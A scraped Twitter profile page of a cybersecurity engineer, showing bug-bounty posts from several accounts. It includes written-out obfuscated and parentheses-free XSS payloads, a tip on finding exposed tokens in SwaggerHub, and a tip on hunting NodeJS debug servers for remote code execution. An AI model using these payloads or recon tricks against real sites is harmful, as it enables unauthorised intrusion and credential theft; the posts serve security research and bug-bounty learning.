Mr.JSON (@avinashcyber) 's Twitter Profile
Mr.JSON

@avinashcyber

β€˜Cybersecurity Engineer’

ID: 781396789454700545

calendar_today29-09-2016 07:34:47

3,3K Tweet

321 Followers

2,2K Following

VIEH Group (@viehgroup) 's Twitter Profile Photo

an XSS payload, Cuneiform-alphabet based π’€€='',π’‰Ί=!π’€€+π’€€,𒀃=!π’‰Ί+π’€€,π’‡Ί=π’€€+{},π’Œ=π’‰Ί[π’€€++], π’€Ÿ=π’‰Ί[π’ˆ«=π’€€],𒀆=++π’ˆ«+π’€€,𒁹=π’‡Ί[π’ˆ«+𒀆],π’‰Ί[𒁹+=π’‡Ί[π’€€] +(π’‰Ί.𒀃+π’‡Ί)[π’€€]+𒀃[𒀆]+π’Œ+π’€Ÿ+π’‰Ί[π’ˆ«]+𒁹+π’Œ+π’‡Ί[π’€€] +π’€Ÿ][𒁹](𒀃[π’€€]+𒀃[π’ˆ«]+π’‰Ί[𒀆]+π’€Ÿ+π’Œ+"(π’€€)")() #bugbounty #bugbountytips #cybersecurity

an XSS payload, Cuneiform-alphabet based

π’€€='',π’‰Ί=!π’€€+π’€€,𒀃=!π’‰Ί+π’€€,π’‡Ί=π’€€+{},π’Œ=π’‰Ί[π’€€++],
π’€Ÿ=π’‰Ί[π’ˆ«=π’€€],𒀆=++π’ˆ«+π’€€,𒁹=π’‡Ί[π’ˆ«+𒀆],π’‰Ί[𒁹+=π’‡Ί[π’€€]
+(π’‰Ί.𒀃+π’‡Ί)[π’€€]+𒀃[𒀆]+π’Œ+π’€Ÿ+π’‰Ί[π’ˆ«]+𒁹+π’Œ+π’‡Ί[π’€€]
+π’€Ÿ][𒁹](𒀃[π’€€]+𒀃[π’ˆ«]+π’‰Ί[𒀆]+π’€Ÿ+π’Œ+"(π’€€)")()

#bugbounty #bugbountytips #cybersecurity
mhmd berro (badcracker) (@badcrack3r) 's Twitter Profile Photo

βš™οΈ Nuclei forge: free tool that helps you visually create Nuclei YAML templates ! πŸ”₯ created by payloadartist ! πŸ‘ forge.bugbountyhunting.com #bugbounty #bugbountytip #bugbountytips #ethicalhacking #hacking #infosec #pentesting #penetrationtesting

βš™οΈ Nuclei forge: free tool that helps you visually create Nuclei YAML templates ! πŸ”₯

created by <a href="/payloadartist/">payloadartist</a> ! πŸ‘

forge.bugbountyhunting.com

#bugbounty #bugbountytip #bugbountytips #ethicalhacking #hacking #infosec #pentesting #penetrationtesting
Vasileiadis A. (Cyberkid) (@anastasis_king) 's Twitter Profile Photo

🧿 Complete Nmap Guide: Mastering Network Scanning πŸŒπŸ” #Nmap #NetworkSecurity #CyberSecurity #Reconnaissance #InfoSec #RedTeam #BlueTeam #PenetrationTesting #EthicalHacking #SIEM #EducationOnly #VulnerabilityAssessment

🧿 Complete Nmap Guide: Mastering Network Scanning πŸŒπŸ”

#Nmap #NetworkSecurity #CyberSecurity #Reconnaissance #InfoSec #RedTeam #BlueTeam #PenetrationTesting #EthicalHacking #SIEM #EducationOnly #VulnerabilityAssessment
R3DD (@r3dd404) 's Twitter Profile Photo

I'm 17. Woke up at 1 in the night. - 6+ hours of focus work - went out for a walk with friends - went to gym - won a $200 bounty we got a long way to go!

I'm 17.

Woke up at 1 in the night.

- 6+ hours of focus work
- went out for a walk with friends
- went to gym
- won a $200 bounty

we got a long way to go!
Remedy (@xyz_remedy) 's Twitter Profile Photo

This is how attackers legally hack crypto wallets. A 25-minute guide used by real pentesters to break into browser wallet extensions like MetaMask. Here’s how they do it:

This is how attackers legally hack crypto wallets.

A 25-minute guide used by real pentesters to break into browser wallet extensions like MetaMask.

Here’s how they do it:
Arshiya (@arshiyaiha) 's Twitter Profile Photo

redacted[.]com/ --> [302]❌ redacted[.]com/app/api/doc/ --> [200 OK] βœ… Bypassed the 302 and hit API doc gold! #bugbountytips #BugBounty

redacted[.]com/ --&gt; [302]❌
redacted[.]com/app/api/doc/ --&gt; [200 OK] βœ…
Bypassed the 302 and hit API doc gold!
 #bugbountytips  #BugBounty
chux (@chux13786509) 's Twitter Profile Photo

Bug Hunters Tip πŸ’₯ Always search your targets in SwaggerHub πŸ”₯ While digging through a target’s SwaggerHub docs, I discovered an exposed valid token, helping me to escalate my privs on the target πŸ’ͺ Got more useful tips for finding secrets during recon? Drop your tips below πŸ‘‡

Bug Hunters Tip πŸ’₯
Always search your targets in SwaggerHub πŸ”₯
While digging through a target’s SwaggerHub docs, I discovered an exposed valid token, helping me to escalate my privs on the target πŸ’ͺ
Got more useful tips for finding secrets during recon?
Drop your tips below πŸ‘‡
mRr3b00t (@uk_daniel_card) 's Twitter Profile Photo

I want to talk about how when you use a VPN there's a few things to think about: 1) your ISP will have logs (netflow/dns) of your connecting to the VPN 2) the routers in the path may also log this 3) the ISP of the VPN provider will log these 4) the VPN provider may say no logs

I want to talk about how when you use a VPN there's a few things to think about:

1) your ISP will have logs (netflow/dns) of your connecting to the VPN
2) the routers in the path may also log this
3) the ISP of the VPN provider will log these
4) the VPN provider may say no logs
Het Mehta (@hetmehtaa) 's Twitter Profile Photo

Stop using basic XSS payloads. β€ŒRenwa compiled the nastiest collection of parentheses-free XSS eval.apply${[alert\\x2823\\x29]} `Reflect.apply.call`${alert}${undefined}${}`[11] `throw onerror=eval,SyntaxError`alert\\x2823\\x29 Check it out: github.com/RenwaX23/XSS-P…

Muqsit 𝕏 (@mqst_) 's Twitter Profile Photo

πŸ—ƒοΈ File Upload Validation Bypass: Breaking Down Multipart Parsers Blog: blog.sicuranext.com/breaking-down-… author: theMiddle

πŸ—ƒοΈ File Upload Validation Bypass: Breaking Down Multipart Parsers

Blog: blog.sicuranext.com/breaking-down-…

author: <a href="/AndreaTheMiddle/">theMiddle</a>
chux (@chux13786509) 's Twitter Profile Photo

Bug Hunters πŸ”₯ Ever stumbled upon this weird message? "WebSockets request was expected" If you did, congratz! You just found a NodeJS server in debug mode, ready to quickly move on to RCE via simple DevTools πŸ’₯πŸ’₯πŸ’₯ Search for this message in Censys/FOFA and your automation πŸ€‘

Bug Hunters πŸ”₯
Ever stumbled upon this weird message?
"WebSockets request was expected"

If you did, congratz!
You just found a NodeJS server in debug mode, ready to quickly move on to RCE via simple DevTools πŸ’₯πŸ’₯πŸ’₯
Search for this message in Censys/FOFA and your automation πŸ€‘